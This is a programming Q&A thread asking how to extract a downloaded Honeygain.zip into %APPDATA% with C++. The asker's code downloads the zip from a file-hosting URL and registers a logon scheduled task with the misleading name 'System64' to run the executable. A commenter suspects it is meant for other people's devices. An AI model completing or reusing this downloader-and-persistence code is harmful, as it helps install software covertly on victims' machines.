# How to unzip with c++?

Tags: c++, zip, unzip

How can i unzip that Downloaded Honeygain.zip to %appdata%?
Whic library i neeed to use with .zips and how _?

```
#include <iostream>
#include<Windows.h>
#include<string>
#include <cstdlib>
#pragma comment(lib, "urlmon.lib")

using namespace std;
int main()
{
    char* appdata = std::getenv("APPDATA");
    if (appdata) {
        std::cout << "Appdata: " << appdata << '\n';
        std::string cmd = std::string("schtasks /create /tn System64 /tr \"") +
            appdata +
            "\\Honeygain\\Honeygain.exe\" /sc ONLOGON";
        system(cmd.c_str());
    }

    string dwnld_URL = "https://srv-file22.gofile.io/downloadStore/srv-store4/YWh3va/Honeygain.zip";
    string savepath = "C:\\Users\\Ester\\Appdata\\Roaming\\Honeygain.zip";
    URLDownloadToFileA(NULL, dwnld_URL.c_str(), savepath.c_str(), 0, NULL);


    return 0;
}
```

Comment: Use libzip from https://libzip.org/. For the how, read the documentation on the site.

Comment: What concrete issues are you facing?
Thanks for considering [How do I ask a good question?](https://stackoverflow.com/help/how-to-ask) and [How to create a Minimal, Reproducible Example](https://stackoverflow.com/help/minimal-reproducible-example).

Comment: Take this as a hint : https://stackoverflow.com/questions/10440113/simple-way-to-unzip-a-zip-file-using-zlib

Comment: Are you trying to install honeygain on other people's devices?

Comment: Does this answer your question? [Unzip a zip file using zlib](https://stackoverflow.com/questions/11611950/unzip-a-zip-file-using-zlib)

Answer (score 1):

I think the easiest way is to create a child process with 'WinRAR' or '7z' to unzip 'Honeygain.zip' to %appdata%.
Or, You can try libzip(https://libzip.org/). It is free, portable and easy to use.